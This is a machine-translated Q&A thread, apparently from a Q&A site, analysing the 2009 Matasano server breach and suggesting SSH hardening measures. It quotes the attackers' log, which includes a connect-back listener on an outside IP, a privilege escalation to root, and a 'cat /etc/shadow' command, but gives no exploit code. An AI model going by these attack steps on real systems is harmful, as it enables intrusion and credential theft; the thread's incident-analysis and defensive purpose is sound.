来自:http : //seclists.org/fulldisclosure/2009/Jul/0388.html
如果我从以下网站上的帖子中最好地理解它:http : //news.ycombinator.com/item?id=723798,Matasano团队让sshd可以访问Internet-从编程的角度来看,有什么建议的解决方案?
Answers:
Matasano是如何被黑客入侵的?
从帖子中的信息到完全披露是不可能的。但是,推测总是很有趣的,因为它们确实给出了一些信息-
#./th3_f1n4l_s0lut10n www.matasano.com [-]正在连接69.61.87.163:22 .. [/]寻找有效的非root用户。 ******** R3D4CT3D h4h4h4h4 ********
他们在th3_f1n41_s01ut10nMatasano的服务器上运行二进制文件“ ”,该服务器连接到ssh端口。它通过某些未知方式找到有效的非root用户,然后删除其余的输出。
#./th3_f1n4l_s0lut10n -u亚当-t 3 www.matasano.com [*] 209.112.118.10:3338。上的Connectback侦听器。 [!] SSH2_MSG_SERVICE_ACCEPT [OpenSSH_4.5p1,OpenSSL 0.9.8g 2007年10月19日]
使用找到的用户名再次运行二进制文件,该用户名登录并在端口3338上连接回其服务器(希望未以其名称注册...)。
adam_at_www:〜$ uname -a Linux www 2.6.20.1-1-686#1 SMP Sun Mar 4 12月44:55 UTC 2007 i686 GNU / Linux **** h4h4h4hh4h4h4 l3tz us3 m0r3!0D4Y!H4H4H4H4H4H4H4 ****
他们可能暗示他们对该内核有0天的时间,当您考虑该公司的存货时,这已经很老了。
adam_at_www:〜$ cd / tmp *********** B0R1NG *********** root_at_www:〜#cat / etc / shadow
糟糕-用户现在突然成为root用户。他们在/ tmp中有一个本地特权提升漏洞,可能是他们所指的0天。
因此,这里至少有两个漏洞利用-OpenSSH漏洞利用在系统上获取有效的非root用户,然后以该用户身份登录,然后进行本地特权升级。
考虑到OpenSSH自版本4.5起存在一些已知的安全问题:
~/.ssh/rc对于其命令已被sshd_config(5)ForceCommand指令覆盖的会话,将不执行OpenSSH 4.9及更高版本。这是有记录的但不安全的行为(在OpenSSH 4.9发行说明中进行了描述)。我想拥有这个较旧的Linux内核和较旧的SSH守护程序就可以做到。而且,它正在他们的www服务器上运行,该服务器可用于Internet,在我看来这是一件充满信心的事情。闯入的人显然想让他们感到尴尬。
如何预防这些攻击?
可以通过主动管理来防止这种情况-确保修补了所有面向互联网的服务,并限制了可以连接的人数,而不是允许人们从任何地方进行连接。这一事件使安全系统管理变得困难,并需要企业投入一定的时间为IT提供时间来修补问题(实际上,至少在较小的公司中这并非易事),这使这一教训更加复杂。
最好使用带括号的方法-使用公钥身份验证,ssh守护程序上的白名单,两因素身份验证,IP限制和/或将所有内容置于VPN后面都是锁定它的可能途径。
我想我知道明天我会做什么。:)
令我惊讶的是,他们在该计算机上拥有如此多的用户。这就是他们确定拥有所有权的方式,其他所有内容都是为了分散人们的注意力。其中之一最有可能让ssh客户端后门安装在其他Shell机器上,然后游戏结束了。为每个人提供Shell帐户并使sshd世界可访问性只是懒惰和愚蠢。